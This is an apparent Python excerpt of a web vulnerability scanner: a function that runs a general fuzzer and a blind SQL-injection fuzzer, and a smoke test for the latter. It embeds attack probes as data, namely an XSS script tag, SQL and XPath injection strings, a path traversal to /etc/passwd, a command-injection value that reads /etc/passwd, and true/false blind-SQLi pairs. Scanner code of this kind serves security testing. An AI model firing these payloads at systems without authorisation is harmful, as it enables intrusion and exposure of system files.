def fuzz(targets):
    """Run the generic web fuzzer and then the blind-SQLi fuzzer over *targets*.

    This is a generator: every result from the WebFuzzer pass is yielded
    first, then every result from the BSQLiFuzzer pass.  Note that both
    ``fuzz()`` calls are issued before the first value is yielded, so the
    second pass is not deferred by a consumer that stops iterating early.

    Args:
        targets: the target collection passed unchanged to both fuzzer
            constructors (its shape is defined by those classes, not here).

    Yields:
        result objects from ``WebFuzzer.fuzz()`` followed by those from
        ``BSQLiFuzzer.fuzz()``.
    """
    # Probe strings for the first pass.  Each is tagged with the check types
    # that should be evaluated against the response; the strings are matched
    # at runtime, so they stay byte-for-byte as written.
    first_pass_payloads = [
        Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list=["xss"]),
        Payload("')--#", check_type_list=["sqli", "xpathi"]),
        Payload('../../../../../../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list=["trav"]),
        Payload('<!--', check_type_list=["xpathi"]),
        # No check_type_list here, so this one relies on Payload's default
        # (defined outside this excerpt).
        Payload('; cat /etc/passwd'),
    ]

    # NOTE(review): proxy_scan_list is a module-level name not visible in this
    # excerpt — presumably a list of proxies; confirm where it is defined.
    web_fuzzer = WebFuzzer(
        targets,
        num_threads=25,
        time_per_url=5,
        request_timeout=4,
        proxy_list=proxy_scan_list,
        hadoop_reporting=True,
    )
    for probe in first_pass_payloads:
        web_fuzzer.add_payload(probe)
    web_fuzzer.generate_fuzzy_targets()
    web_results = web_fuzzer.fuzz()

    # Second pass: boolean-based blind SQLi.  Each group pairs a condition
    # that should hold with one that should not; the "truth" flag records
    # which is which (how the fuzzer consumes it is defined elsewhere).
    and_group = BSQLIPayloadGroup(
        BSQLIPayload(" AND 1=1", {"truth": True}),
        BSQLIPayload(" AND 1=2", {"truth": False}),
    )
    or_group = BSQLIPayloadGroup(
        BSQLIPayload(" OR 1=1", {"truth": True}),
        BSQLIPayload(" OR 1=2", {"truth": False}),
    )
    bsqli_fuzzer = BSQLiFuzzer(
        targets,
        bsqli_payload_groups=[and_group, or_group],
        hadoop_reporting=True,
        num_threads=10,
    )
    bsqli_results = bsqli_fuzzer.fuzz()

    yield from web_results
    yield from bsqli_results
def test_bsqlifuzzer(self):
    """Smoke-test BSQLiFuzzer with two true/false payload groups.

    The method only verifies that ``BSQLiFuzzer.fuzz()`` runs to completion
    without raising: its return value is bound but never asserted on.
    ``self`` is not read, and ``targets`` is neither a parameter nor a local
    here, so it must resolve to a module-level name (or may have been meant
    as ``self.targets``) — confirm before relying on this test.
    """
    def make_group(true_suffix, false_suffix):
        # Pair a condition that should hold with one that should not; the
        # "truth" flag records which is which.
        return BSQLIPayloadGroup(
            BSQLIPayload(true_suffix, {"truth": True}),
            BSQLIPayload(false_suffix, {"truth": False}),
        )

    # First group uses AND-based conditions; the second uses OR-based ones
    # (the original comment says the second is for checking the returned
    # content length).
    payload_groups = [
        make_group(" AND 1=1", " AND 1=2"),
        make_group(" OR 1=1", " OR 1=2"),
    ]
    bf = BSQLiFuzzer(
        targets,
        bsqli_payload_groups=payload_groups,
        hadoop_reporting=False,
        num_threads=10,
    )
    # Return value is kept only for debugging; nothing is asserted on it.
    outcome = bf.fuzz()